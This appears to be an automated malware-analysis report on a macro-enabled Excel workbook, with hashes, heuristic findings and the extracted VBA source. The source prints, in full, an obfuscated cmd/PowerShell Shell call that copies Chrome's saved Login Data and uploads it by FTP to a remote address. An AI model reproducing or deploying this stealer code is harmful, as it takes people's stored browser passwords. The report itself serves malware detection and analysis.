Office (OOXML) malware analysis — malicious · 11f4f010597a62b4

MALICIOUS

Office (OOXML)

19.9 KB Created: 2021-02-28 19:44:56 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-04-01

MD5: 279e1ea18e99d9cbee8ea918515415fe SHA-1: 68f9bdeca0303a452e2fdd1ef288b7158a81b72a SHA-256: 11f4f010597a62b4201bfcf3166e9a032c863370dc5202098f072ac170e4832a

140 Risk Score

Heuristics 3

VBA project inside OOXML medium 2 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

    strOutput = Shell("cmd /V:ON/C""set XP0u=n&&set sOK=a&&set h4=""""""""$env:tmp\ch&&set iQKN=inati&&set nZl=:&&set qM=cmd.ex&&set oq=""""&&set F1=)&&set BnlF=AppD&&set ya5P=romeLoginData""""&&set 7ECK=ta\Google\Ch&&set FcD2=New-Ob&&set OB0G=a', """"&&set qYPO=at&&set b0Sc=Lo&&set rR0=ymous&&set r4= /C Powershell &&set 6n=e&&set JS=rome\User Data\De&&set FdBn=Loc&&set 29=fault\Login Data""""&&set QRS= System.Net.WebClient).UploadFile('ftp&&set vi=p\chrome&&set gG62=th """"&&set IA=opy-Item -Pa …

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA
Matched line in script
```
    ActiveCell.FormulaR1C1 = "    strCommand = ""Powershell Echo Hello World"""
```

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	3853 bytes
SHA-256: `d11c05d1a5dc22932c2f6edaebf34aab53a85d6447a8833de7b5182bf30f742e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Modul1" Sub test1() Attribute test1.VB_ProcData.VB_Invoke_Func = " \n14" ' ' test1 Makro ' ' ActiveWindow.SmallScroll Down:=12 Range("A16").Select ActiveWindow.SmallScroll Down:=27 ActiveWindow.ScrollRow = 42 ActiveWindow.ScrollRow = 41 ActiveWindow.ScrollRow = 40 ActiveWindow.ScrollRow = 39 ActiveWindow.ScrollRow = 38 ActiveWindow.ScrollRow = 36 ActiveWindow.ScrollRow = 34 ActiveWindow.ScrollRow = 32 ActiveWindow.ScrollRow = 30 ActiveWindow.ScrollRow = 27 ActiveWindow.ScrollRow = 25 ActiveWindow.ScrollRow = 23 ActiveWindow.ScrollRow = 21 ActiveWindow.ScrollRow = 19 ActiveWindow.ScrollRow = 16 ActiveWindow.ScrollRow = 14 ActiveWindow.ScrollRow = 13 ActiveWindow.ScrollRow = 11 ActiveWindow.ScrollRow = 8 ActiveWindow.ScrollRow = 6 ActiveWindow.ScrollRow = 5 ActiveWindow.ScrollRow = 3 ActiveWindow.ScrollRow = 2 ActiveWindow.ScrollRow = 1 Range("A1").Select ActiveSheet.Paste ActiveWindow.SmallScroll Down:=6 ActiveWindow.ScrollRow = 24 ActiveWindow.ScrollRow = 23 ActiveWindow.ScrollRow = 22 ActiveWindow.ScrollRow = 21 ActiveWindow.ScrollRow = 20 ActiveWindow.ScrollRow = 19 ActiveWindow.ScrollRow = 18 ActiveWindow.ScrollRow = 17 ActiveWindow.ScrollRow = 16 ActiveWindow.ScrollRow = 15 ActiveWindow.ScrollRow = 14 ActiveWindow.ScrollRow = 12 ActiveWindow.ScrollRow = 11 ActiveWindow.ScrollRow = 10 ActiveWindow.ScrollRow = 9 ActiveWindow.ScrollRow = 8 ActiveWindow.ScrollRow = 7 ActiveWindow.ScrollRow = 6 ActiveWindow.ScrollRow = 5 ActiveWindow.ScrollRow = 4 ActiveWindow.ScrollRow = 3 ActiveWindow.ScrollRow = 2 ActiveWindow.ScrollRow = 1 Range("A2").Select ActiveCell.FormulaR1C1 = "" Range("A3").Select ActiveCell.FormulaR1C1 = " strCommand = ""Powershell Echo Hello World""" Range("A6").Select ChDir "C:\Users\Kassandra\Desktop" ActiveWorkbook.SaveAs Filename:="C:\Users\Kassandra\Desktop\test1.xlsm", _ FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False Range("C7").Select End Sub Attribute VB_Name = "DieseArbeitsmappe" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Tabelle1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Modul2" Function RunAndGetCmd() strOutput = Shell("cmd /V:ON/C""set XP0u=n&&set sOK=a&&set h4=""""""""$env:tmp\ch&&set iQKN=inati&&set nZl=:&&set qM=cmd.ex&&set oq=""""&&set F1=)&&set BnlF=AppD&&set ya5P=romeLoginData""""&&set 7ECK=ta\Google\Ch&&set FcD2=New-Ob&&set OB0G=a', """"&&set qYPO=at&&set b0Sc=Lo&&set rR0=ymous&&set r4= /C Powershell &&set 6n=e&&set JS=rome\User Data\De&&set FdBn=Loc&&set 29=fault\Login Data""""&&set QRS= System.Net.WebClient).UploadFile('ftp&&set vi=p\chrome&&set gG62=th """"&&set IA=opy-Item -Pa&&set kt=://ano&&set 2bqk=""""""""$env:&&set rp=@192.168.56.102/data/logind&&set n2ef=ject&&set 49=C&&set qSk=ginData; (&&set Kwi=""""""""&&set 4y=al&&set Bo=on $env:tm&&set 6Ee="""""""" -Dest&&call set 98R=%qM%%6n%%r4%%49%%IA%%gG62%%2bqk%%FdBn%%4y%%BnlF%%sOK%%7ECK%%JS%%29%%6Ee%%iQKN%%Bo%%vi%%b0Sc%%qSk%%FcD2%%n2ef%%QRS%%kt%%XP0u%%rR0%%nZl%%rp%%qYPO%%OB0G%%h4%%ya5P%%Kwi%%F1%&&call %98R:""""=!oq:~1!%""") End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	36864 bytes
SHA-256: `c36375af10769350b2bb4e428fa3fe42d8b8eda12c9f4e9abdda09a275578be9`

Open this report in the interactive analyzer, or submit your own file for analysis.